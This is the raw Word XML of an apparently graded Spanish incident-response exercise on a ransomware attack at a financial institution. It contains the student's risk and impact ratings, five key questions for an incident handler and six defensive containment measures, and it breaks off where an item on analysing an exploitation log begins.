      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Alta. Aunque al inicio no se conozca todo el alcance, ya hay afectación sobre servicios relevantes y existen indicios de propagación. Si el cifrado se reactiva tras reiniciar sistemas o alcanza nuevas unidades de red, debe asumirse que la amenaza sigue activa y con capacidad de expansión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Alto. En una entidad financiera, la indisponibilidad de archivos compartidos afecta de forma directa a la operativa y a la continuidad de negocio. Además del impacto operativo, debe contemplarse el riesgo regulatorio, reputacional y de posible exposición de datos.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="397" w:hanging="397"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_11mb1dfipks6" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Punto evaluable 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Valor: +1,5 puntos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Respuesta: </w:t>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5 preguntas</w:t>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Justificación en texto libre del porqué de la importancia/elección de dicha pregunta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A">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color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como Incident Handler, realizaría las siguientes 5 preguntas clave para tomar el control de la situación:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">¿Disponéis de un inventario actualizado de activos y cuáles de ellos están identificados como críticos para el negocio?</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Necesito saber qué activos son prioritarios para la continuidad operativa, como controladores de dominio, servidores de ficheros, bases de datos o plataformas de banca interna, para ordenar correctamente la contención y la recuperación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">¿Cuál es el esquema actual de segmentación de red y qué controles perimetrales o internos (como Firewalls, WAF, VPN) están activos?</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Esto permite saber si la red está segmentada o si el atacante puede moverse lateralmente con facilidad. También ayuda a decidir qué bloquear primero y dónde aplicar medidas de aislamiento sin detener por completo el negocio y mitigar el impacto del ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">¿Qué herramientas de monitorización y respuesta tenéis (como EDR, SIEM, Antivirus) desplegadas y dónde se centralizan sus logs?</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Para el análisis forense necesito saber si hay EDR, SIEM, antivirus, firewall, proxy o registros de autenticación disponibles. La ubicación y retención de esos logs es crítica para no perder evidencia y reconstruir la secuencia del ataque. Además ver cual es la configuración y reglas de estos sistemas para mejorarlos en respuesta del incidente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">¿Cuál es el estado de las copias de seguridad y están aisladas de la red principal?</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Antes de hablar de restauración hay que validar si las copias están íntegras, si son recientes y si están realmente aisladas, offline o protegidas frente al cifrado malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">¿Qué acciones técnicas exactas se han ejecutado desde el primer aviso hasta este momento?</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Necesito saber qué equipos se han reiniciado, qué servicios se han detenido, si se han restaurado sistemas o si se han tocado credenciales. Eso determina qué evidencia se ha podido perder y qué errores hay que dejar de repetir inmediatamente.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="397" w:hanging="397"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gf94b42vcuf1" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Punto evaluable 4</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ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Valor: +1,5 puntos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Respuesta: </w:t>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Medidas iniciales de contención (mínimo 5)</w:t>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Justificación en texto libre de la elección de las medidas de contención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9">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color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como no podemos cortar Internet por completo, mi prioridad sería frenar el movimiento lateral, contener la propagación y preservar la evidencia. Estas serían las 6 medidas iniciales:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">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Segmentación de emergencia y control de tráfico lateral</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Al tratarse de una red plana, el atacante puede desplazarse con facilidad. Aplicaría reglas temporales en firewalls internos y ACL para limitar RDP, SMB, WinRM y otros protocolos de administración remota entre segmentos que no necesiten comunicarse.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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Extracción prioritaria de logs y evidencias volátiles</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Antes de que se sobrescriban o sean borrados, recogería logs de controladores de dominio, firewalls, proxies, EDR y hosts afectados. En los sistemas que sigan encendidos, priorizaría la captura de memoria y de conexiones activas siempre que sea viable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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Gestión de identidades y revocación de accesos privilegiados</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Si existen indicios de compromiso en controladores de dominio comprometidos, iniciaría un reseteo escalonado de cuentas privilegiadas, cuentas de servicio y credenciales de alto valor, además de forzar el cierre de sesiones activas y revisar altas recientes de cuentas o privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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Restricción estricta del tráfico saliente</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Configuraría el firewall perimetral para permitir únicamente los destinos imprescindibles para la operación. El objetivo no es "bloquear IPs desconocidas" de forma genérica, sino reducir la superficie de salida para dificultar la comunicación con C2, la exfiltración y la descarga de nuevas herramientas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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Validación de backups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Detendría cualquier restauración hasta confirmar que las copias son limpias, íntegras y utilizables. Restaurar demasiado pronto puede reintroducir el problema o dificultar la investigación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Activación del plan de comunicación</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Pondría en marcha el plan de comunicación con dirección, personal técnico, equipo legal y autoridades competentes para que la crisis se gestione con criterios técnicos, regulatorios y reputacionales coherentes.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1843"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6lhet8k8ib92" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="f79646"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tarea 2: Evaluación de la respuesta a un incidente (6 puntos)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="397" w:hanging="397"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2qywbqdhyliv" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Punto evaluable 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Valor: +1 punto </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Respuesta: </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34" w:right="0" w:hanging="357"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>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Entrada de log de explotación</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Justificación en texto libre de la elección de la línea de log + qué es lo que realiza el atacante + que vulnerabilidad ha explotado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5A">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
